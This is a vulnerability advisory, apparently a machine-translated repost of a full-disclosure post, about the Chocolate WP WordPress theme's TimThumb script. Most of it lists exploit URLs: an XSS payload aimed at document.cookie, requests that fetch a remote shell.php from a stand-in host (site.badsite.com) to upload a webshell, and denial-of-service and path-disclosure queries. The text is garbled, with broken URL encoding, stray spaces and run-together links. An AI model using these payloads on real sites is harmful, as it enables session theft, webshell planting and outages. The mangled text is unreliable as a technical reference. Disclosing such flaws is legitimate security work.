Affected System: WordPress Chocolate WP Theme Description: bugtraq id: 57541 WordPress Chocolate WP is the business topic of WP. Chocolate WP Theme for WordPress has cross-site scripting, path leakage, abuse of features, DOS, and Arbitrary File Upload vulnerabilities, attackers can exploit these vulnerabilities to launch DoS attacks, upload arbitrary files to affected computers, and execute arbitrary script code. For details, see XSS (WASC-08) (in older versions of TimThumb ): http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src0000%3cbody%20onload%alert(document.cookie%%3e.jpg Full path disclosure (WASC-13 ): http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = % 3C111 http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = http://up.2cto.com/2013/0127/20130127104757723.png&h=1&w=1111111 http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = http://up.2cto.com/2013/0127/20130127104757723.png&h=1111111&w=1 Abuse of Functionality (WASC-42 ): http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = http: // site & h = 1 & w = 1 http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = http://site.badsite.com & h = 1 & w = 1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10 ): http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = http: // site/big_file & h = 1 & w = 1 http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) about such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites ( http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html ). Arbitrary File Upload (WASC-31 ): http://site/wp-content/themes/dt-chocolate/ Thumb. php? Src = http://site.badsite.com/shell.php Full path disclosure (WASC-13 ): http://site/wp-content/themes/dt-chocolate/ <* Source: Eugene Dokukin link: http://seclists.org/fulldisclosure/2013/Jan/215 *> Test method: The following procedures (methods) may be offensive and only used for security research and teaching. Users are at your own risk! To exploit these issues, an attacker must entice an unsuspecting user to follow a malicious URI. The following example URIs are available: http://www.bkjia.com /Wp-content/themes/dt-chocolate/thumb. php? Src0000%3cbody%20onload%alert(document.cookie%%3e.jpg http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php Suggestion: vendor patch: WordPress --------- currently, the vendor has not provided patches or upgraded programs. We recommend that users who use this software follow the vendor's homepage to obtain the latest version: http://wordpress.org/